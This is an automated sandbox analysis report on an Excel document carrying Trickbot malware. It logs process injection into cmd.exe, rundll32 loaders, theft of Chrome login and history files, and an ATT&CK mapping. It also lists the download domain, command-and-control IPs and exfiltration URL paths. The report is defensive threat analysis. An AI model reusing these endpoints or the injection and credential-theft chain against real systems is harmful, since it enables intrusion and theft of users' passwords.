                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 18009A000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 18009A000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1800B5000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1800B5000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1800BA000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1800BA000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 140000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 150000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 260000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 140000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 260000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 280000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 290000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 4B0000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 49D790B4
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 1E60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 18005D000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 18005D000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 180079000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 180079000
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
                Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\System32\wermgr.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting11Path InterceptionAccess Token Manipulation1Masquerading131OS Credential Dumping1Security Software Discovery22Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection312Disable or Modify Tools21LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection312LSA SecretsSystem Network Configuration Discovery11SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonScripting11Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 403507 Sample: SecuriteInfo.com.Heur.31681.20936 Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 9 other signatures 2->60 9 EXCEL.EXE 90 49 2->9         started        14 taskeng.exe 1 2->14         started        process3 dnsIp4 50 deluciaspizza.com 144.208.70.30, 443, 49165 IMH-WESTUS United States 9->50 34 C:\Users\user\fndskfnds.dfm, PE32 9->34 dropped 36 C:\Users\user\AppData\...\netmouser[1].dll, PE32 9->36 dropped 74 Document exploit detected (creates forbidden files) 9->74 76 Document exploit detected (UrlDownloadToFile) 9->76 16 rundll32.exe 9->16         started        18 rundll32.exe 14->18         started        file5 signatures6 process7 process8 20 rundll32.exe 16->20         started        signatures9 62 Writes to foreign memory regions 20->62 64 Allocates memory in foreign processes 20->64 23 wermgr.exe 2 20->23         started        process10 dnsIp11 44 188.18.7.133, 447, 49170 ROSTELECOM-ASRU Russian Federation 23->44 46 117.54.250.246, 443, 49167, 49169 INDONET-AS-APINDOInternetPTID Indonesia 23->46 48 5 other IPs or domains 23->48 66 Hijacks the control flow in another process 23->66 68 May check the online IP address of the machine 23->68 70 Writes to foreign memory regions 23->70 72 2 other signatures 23->72 27 cmd.exe 13 23->27         started        32 cmd.exe 23->32         started        signatures12 process13 dnsIp14 52 103.102.220.50, 443, 49172 ZT-AS-APZohakTechnologyZ-TechAF Afghanistan 27->52 38 C:\Users\user\AppData\Local\...\Web Data.bak, SQLite 27->38 dropped 40 C:\Users\user\AppData\...\Login Data.bak, SQLite 27->40 dropped 42 C:\Users\user\AppData\Local\...\History.bak, SQLite 27->42 dropped 78 Tries to harvest and steal browser information (history, passwords, etc) 27->78 file15 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Heur.31681.xls7%VirustotalBrowse
                SecuriteInfo.com.Heur.31681.xls12%MetadefenderBrowse
                SecuriteInfo.com.Heur.31681.xls13%ReversingLabsDocument-Excel.Trojan.Heuristic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll32%ReversingLabsWin32.Trojan.Wacatac
                C:\Users\user\fndskfnds.dfm32%ReversingLabsWin32.Trojan.Wacatac

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                5.3.wermgr.exe.3223aa98.0.unpack100%AviraHEUR/AGEN.1110360Download File
                5.3.wermgr.exe.317c25e0.1.unpack100%AviraHEUR/AGEN.1110360Download File
                5.3.wermgr.exe.31745a98.2.unpack100%AviraHEUR/AGEN.1110360Download File
                4.2.rundll32.exe.2460000.8.unpack100%AviraHEUR/AGEN.1138157Download File

                Domains

                SourceDetectionScannerLabelLink
                deluciaspizza.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/O0%Avira URL Cloudsafe
                http://crl.comodoca.c0%Avira URL Cloudsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/0%Avira URL Cloudsafe
                http://189.195.96.238:4430%Avira URL Cloudsafe
                http://36.95.27.243:4430%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
